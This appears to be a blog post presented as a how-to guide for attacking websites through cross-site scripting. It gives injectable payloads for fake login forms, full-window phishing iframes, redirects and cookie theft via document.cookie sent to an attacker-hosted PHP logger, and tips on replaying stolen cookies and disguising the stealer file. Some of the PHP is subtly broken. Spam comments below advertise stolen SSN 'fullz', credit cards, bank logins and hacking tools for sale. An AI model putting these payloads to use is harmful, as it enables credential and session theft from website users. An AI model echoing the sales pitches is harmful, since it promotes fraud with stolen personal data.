What is XSS ?
XSS or CSS stands for Cross Site Scripting which is believed to be the most common hacking technique. It's about injecting some malicious commands using the scripting languages to the website vulnerable areas, this makes the browser to just run the code without filtering the attackers input. This code can be phishing script or anything that could harm the users privacy.
How to use XSS technique?
To use this code you should insert this to search box or any vulnerable area of website that make this embedded to website coding so that iit can be executed at runtime. Here are some attack techniques you can do with a XSS flaw:
1.) Phishing script inject:
Just inject a 'user' and 'password' field in html with the <html> and <body> tags), that the victim may think he need
to login to the target site.
Here an example:
www.site.ru/google.php?search=<html><body><head><meta content="text/html; charset=utf-8"></meta></head>
<div style="text-align: center;"><form Method="POST" Action="http://www.phishingsite.ru/phishingscript.php">
Phishingpage :<br /><br/>Username :<br /> <input name="User" /><br />Password :<br />
<input name="Password" type="password" /><br /><br /><input name="Valid" value="Ok !" type="submit" />
<br /></form></div></body></html>
content of phishingscript.php
<?php
login = $_POST['user'];
password = $_POST['Password'];
open = fopen('log.txt', 'a+');
fputs($open, 'Username : ' . $login . '<br >' . '
Password : ' . $password . '<br >' . '<br >');
?>
2.) Iframe Phishing:
Simple thing, just inject a javascript code containing an iframe where your phishing site is embeeded.
obviously it needs to look just like the target site.
Here an example:
www.site.ru/google.php?search=<iframe src="http://www.yourphishingsite.ru" height="100%" width="100%"></iframe>
(Note: height="100%" width="100%" means that the whole window is filled with that iframe.)
The target site will spawn your phishing site in an Iframe, and the website user / victims won't see a
difference and log in (If they're are foolish enough).
3.) Rediriction Phishing:
Also simple, just inject a javascript rediriction script that leads to your phishingsite, of course it needs to look just like the target site.
Here an example:
www.site.ru/google.php?search=<script>document.location.href="http://www.yourphishingsite.ru"</script>
or
www.site.ru/google.php?search=<META HTTP-EQUIV="refresh" CONTENT="0; URL="http://www.yorphishingsite.ru">
4.) Cookie stealing:
One of the feared things in XSS flaws is the cookie stealing attack. In this method you need to place this cookiestealer.php in your hoster, and then inject a javascript with your cookie stealer script embedded on your target website.
content of cookiestealer.php (found it somewhere with google)
<?php
cookie = $HTTP_GET_VARS["cookie"];
file = fopen('log.txt', 'a');
fwrite($file, $cookie . "nn");
fclose($file);
?>
Save it as cookiestealer.php and create a 'log.txt' and upload both files
on your own webspace, in the same directory and set "chmod 777".
Inject the following code in your target website:
http://www.site.ru/google.php?search=<script>location.href = 'http://phishingsite.ru/cookiestealer.php?cookie='+document.cookie;</script>
Then the victim's cookie (target's website user who visited the url above) should
appear in the log.txt.
Now you simply need to insert the cookie (with e.g. live http headers firefox addon)
and use it.
Obviously you need to replace
http://www.yourphishingsite.ru
With the url of your phishingsite.
PROTIP: rename your 'cookiestealer.php' to something like 'turtles.php', #
this looks less suspicous.
Hey Guys !
ReplyDeleteUSA Fresh & Verified SSN Leads with DL Number AVAILABLE with 99.9% connectivity
All Leads have genuine & valid information
**HEADERS IN LEADS**
First Name | Last Name | SSN | Dob | DL Number | Address | City | State | Zip | Phone Number | Account Number | Bank Name | Employee Details | IP Address
*Price for SSN lead $2
*You can ask for sample before any deal
*If anyone buy in bulk, we can negotiate
*Sampling is just for serious buyers
==>ACTIVE, FRESH CC & CVV FULLZ AVAILABLE<==
->$5 PER EACH
->Hope for the long term deal
->Interested buyers will be welcome
**Contact 24/7**
Whatsapp > +923172721122
Email > leads.sellers1212@gmail.com
Telegram > @leadsupplier
ICQ > 752822040
SSN FULLZ AVAILABLE
ReplyDeleteFresh & valid spammed USA SSN+Dob Leads with DL available in bulk & high credit 700+
>>1$ each SSN+DOB
>>3$ each with SSN+DOB+DL
>>5$ each for premium fullz (700+ credit score with replacement guarantee)
Prices are negotiable in bulk order
Serious buyer contact me no time wasters please
Bulk order will be preferable
CONTACT
Telegram > @leadsupplier
ICQ > 752822040
Email > leads.sellers1212@gmail.com
OTHER STUFF YOU CAN GET
SSN+DOB Fullz
CC's with CVV's (vbv & non-vbv)
USA Photo ID'S (Front & back)
All type of Tools & Tutorials available
(Carding, spamming, hacking, scam page, Cash outs, dumps cash outs)
SQL Injector
Premium Accounts (Netflix, Pornhub, etc)
Paypal Logins
Bitcoin Cracker
SMTP Linux Root
DUMPS with pins track 1 and 2
WU & Bank transfers
Socks, rdp's, vpn
Php mailer
Server I.P's
HQ Emails with passwords
All types of tools & tutorials.. & much more
Looking for long term business
For trust full vendor, feel free to contact
CONTACT
Telegram > @leadsupplier
ICQ > 752822040
Email > leads.sellers1212@gmail.com